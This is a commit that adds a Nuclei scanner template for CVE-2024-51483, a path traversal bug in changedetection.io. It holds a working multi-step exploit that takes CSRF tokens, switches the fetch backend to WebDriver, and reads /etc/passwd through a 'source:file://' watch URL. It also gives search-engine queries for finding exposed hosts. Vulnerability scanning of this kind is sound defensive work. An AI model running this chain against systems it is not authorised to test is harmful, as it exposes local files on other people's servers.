Create CVE-2024-51483.yaml

2024-11-11 22:03:10 +05:30 · 2024-11-11 22:03:10 +05:30 · 469d1ae4c2
parent 63b8abf5d8
commit 469d1ae4c2
1 changed files with 109 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-51483.yaml
+++ b/http/cves/2024/CVE-2024-51483.yaml
@ -0,0 +1,109 @@
+id:  CVE-2024-51483
+
+info:
+  name: Changedetection.io <= 0.47.4 Path Traversal
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: medium
+  description: |
+    changedetection.io is free, open source web page change detection software. Prior to version 0.47.5, when a WebDriver is used to fetch files, `source-file-///etc/passwd` can be used to retrieve local system files, where the more traditional `file-///etc/passwd` gets blocked. Version 0.47.5 fixes the issue.
+  reference:
+    - https://github.com/advisories/GHSA-cwgg-57xj-g77r
+    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/model/Watch.py#L19
+    - https://github.com/dgtlmoon/changedetection.io/blob/master/changedetectionio/processors/__init__.py#L35
+    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
+    - https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
+  classification:
+    epss-score: 0.00045
+    epss-percentile: 0.16805
+  metadata:
+    verified: true
+    max-request: 6
+    vendor: changedetection
+    product: changedetection
+    shodan-query: http.title:"change detection"
+    fofa-query: title="change detection"
+    google-query: intitle:"change detection"
+  tags: cve,cve2024,changedetection,lfi
+
+http:
+  - raw:
+      - |
+        GET /settings HTTP/1.1
+        Host: {{Hostname}}
+        Upgrade-Insecure-Requests: 1
+        Connection: keep-alive
+  
+    extractors:
+      - type: regex
+        name: csrf
+        internal: true
+        part: body
+        regex:
+          - 'name="csrf_token" value="(.*)?"'
+        group: 1
+
+  - raw:
+      - |
+        POST /settings HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_token={{csrf}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-rss_hide_muted_watches=y&application-pager_size=50&application-notification_urls=&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-base_url=&application-fetch_backend=html_webdriver&application-webdriver_delay=&requests-default_ua-html_requests=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F87.0.4280.66+Safari%2F537.36&requests-default_ua-html_webdriver=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&requests-extra_browsers-0-browser_name=&requests-extra_browsers-0-browser_connection_url=&requests-extra_browsers-1-browser_name=&requests-extra_browsers-1-browser_connection_url=&requests-extra_browsers-2-browser_name=&requests-extra_browsers-2-browser_connection_url=&requests-extra_browsers-3-browser_name=&requests-extra_browsers-3-browser_connection_url=&requests-extra_browsers-4-browser_name=&requests-extra_browsers-4-browser_connection_url=&save_button=Save
+
+    skip-variables-check: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: csrf2
+        internal: true
+        part: body
+        regex:
+          - 'name="csrf_token" value="(.*)?"'
+        group: 1
+
+  - raw:
+      - |
+        POST /form/add/quickwatch HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - "status_code==302"
+
+  - raw:
+      - |
+        GET /?{{wait_for(9)}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: uuid
+        internal: true
+        part: body
+        regex:
+          - '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
+        group: 1
+
+  - raw:
+      - |
+        GET /preview/{{uuid}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body,'root:x:0')"
+          - "contains(content_type,'text/html')"
+          - 'status_code == 200'
+        condition: and